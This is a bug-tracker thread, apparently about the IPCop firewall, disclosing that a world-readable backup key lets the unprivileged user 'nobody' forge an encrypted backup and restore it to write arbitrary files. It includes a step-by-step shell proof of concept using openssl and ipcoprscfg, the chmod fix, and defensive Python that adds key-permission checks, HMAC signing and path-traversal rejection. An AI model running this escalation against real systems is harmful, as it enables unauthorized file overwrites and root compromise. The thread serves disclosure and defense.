The user "nobody" can (over)write arbitrary files by
creating fake backups and restoring them.
Cause:
The key used to encrypt the backup file is world readable:
# ls -al /var/ipcop/backup/
-rw-r--r-- 1 root root 74 2005-02-05 20:30 backup.key
POC:
$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
$ cd /tmp
$ mkdir etc
$ echo hacked > etc/hacked
$ tar cvfz backup.tgz etc/
etc/
etc/hacked
$ /usr/bin/openssl des3 -e -salt -in backup.tgz -out backup.dat -kfile /var/ipcop/backup/backup.key
$ cp backup.dat /home/httpd/html/backup/ipcop.dat
$ ls -al /etc/hacked
ls: /etc/hacked: No such file or directory
$ /usr/local/bin/ipcoprscfg --hardware
$ ls -al /etc/hacked
-rw-r--r-- 1 nobody nobody 7 2005-10-07 00:05 /etc/hacked
Bingo.
Note: I assumed that I have a shell as user nobody, for
example by exploiting a vulnerable service.
To get this I entered a valid shell for nobody in
/etc/passwd and did a "su - nobody".
FIX: Change access rights on /var/ipcop/backup/backup.key
Logged In: YES
user_id=1041094
Ok backup.key is now '400' protected
But I would like to know why we bother with two kinds of
sets. Encrypted and not encrypted....
Logged In: YES
user_id=317036
Maybe you shouldn't close the bug if you ask a question? :p
Encrypted backups can only be restored on the IPCop that
made them (as it has the key). Unencrypted backups can only
be restored on an IPCop that has never made a web backup
(one that has no key). The idea being that if you have to
rebuild your IPCop you can still get a backup onto it.
Trouble is unencrypted web backups totally break our security
model. I can't see any way to do unencrypted web backup and
restore without allowing nobody -> root privilege
escalation. I'm not actually convinced the encrypted
backups are any better - without a signature on them it's
still possible an attacker could manipulate an existing backup.
I know gilles has been making some changes here, but I'm not
sure they go anywhere near far enough.
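The two points raised in this thread, the world-readable key that the report's PoC abuses and the missing signature on the backup mentioned in the comment above, can both be checked in the restore path. The example below is added here and is not IPCop's own backup code; it assumes a hypothetical container layout of ciphertext followed by a 32-byte HMAC-SHA256 tag, keyed by a separate root-only MAC key (the des3 encryption step itself is left out, as the signature is the point). The restore routine refuses a key file that is group/world readable (the fix in the report), rejects any backup whose tag does not verify (so a forged backup.dat or a bit-flipped existing one is not restored), and refuses archive members that would escape the restore directory. All file contents and key bytes are constructed for the demo.

```python
import hashlib
import hmac
import io
import os
import stat
import tarfile
import tempfile

# Assumed container layout (not IPCop's format): <ciphertext> || <HMAC-SHA256 tag>
TAG_LEN = 32


def key_is_private(path):
    """True only for a regular file with no group/other permission bits (e.g. 0400)."""
    st = os.stat(path)
    return stat.S_ISREG(st.st_mode) and (st.st_mode & 0o077) == 0


def load_key(path):
    """Refuse a key that 'nobody' could read, the condition the PoC relied on."""
    if not key_is_private(path):
        raise PermissionError("%s is group/world readable; chmod 400 it" % path)
    with open(path, "rb") as f:
        return f.read()


def make_tar(files):
    """Build an in-memory .tgz from {member_name: bytes}; stands in for backup.tgz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def seal(blob, mac_key):
    """Append an HMAC over the (already encrypted) blob; this is the missing signature."""
    return blob + hmac.new(mac_key, blob, hashlib.sha256).digest()


def open_sealed(sealed, mac_key):
    """Constant-time tag check; returns the blob, or None if the backup was tampered with."""
    if len(sealed) < TAG_LEN:
        return None
    blob, tag = sealed[:-TAG_LEN], sealed[-TAG_LEN:]
    expected = hmac.new(mac_key, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return blob


def restore(sealed, mac_key, dest):
    """Restore only a verified backup; returns restored member names, or None on refusal."""
    blob = open_sealed(sealed, mac_key)
    if blob is None:
        return None
    abs_dest = os.path.abspath(dest)
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        names = []
        for member in tar.getmembers():
            # Reject absolute names and '..' so no member lands outside dest.
            target = os.path.normpath(os.path.join(abs_dest, member.name))
            if not target.startswith(abs_dest + os.sep):
                return None
            names.append(member.name)
        tar.extractall(abs_dest)
    return names


def demo():
    """Replay the report's attack against the signed layout; all inputs are constructed."""
    tmp = tempfile.mkdtemp()
    key_path = os.path.join(tmp, "backup.key")
    with open(key_path, "wb") as f:
        f.write(b"constructed-root-only-mac-key")
    os.chmod(key_path, 0o400)
    mac_key = load_key(key_path)
    dest = os.path.join(tmp, "restore")
    os.mkdir(dest)

    good = seal(make_tar({"etc/hosts": b"127.0.0.1 localhost\n"}), mac_key)
    # Attacker as 'nobody' can build the tar but not the tag without the key.
    forged = seal(make_tar({"etc/hacked": b"hacked\n"}), b"attacker-guess")
    flipped = bytearray(good)
    flipped[0] ^= 0x01  # manipulate an existing backup in place

    os.chmod(key_path, 0o644)  # the pre-fix state from the report
    try:
        load_key(key_path)
        world_readable_rejected = False
    except PermissionError:
        world_readable_rejected = True

    return {
        "good": restore(good, mac_key, dest),
        "forged": restore(forged, mac_key, dest),
        "flipped": restore(bytes(flipped), mac_key, dest),
        "world_readable_rejected": world_readable_rejected,
    }
```

The MAC key must be distinct from the encryption key and, like it, readable by root only; with the key on 0644 as in the report, anyone who can write to the web backup directory can produce a valid tag just as easily as a valid ciphertext, and the signature buys nothing.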
Logged In: YES
user_id=691649
Now that backup.key access is restricted to root, this point
should be considered closed.
Unencrypted backup is covered by another SF bug report.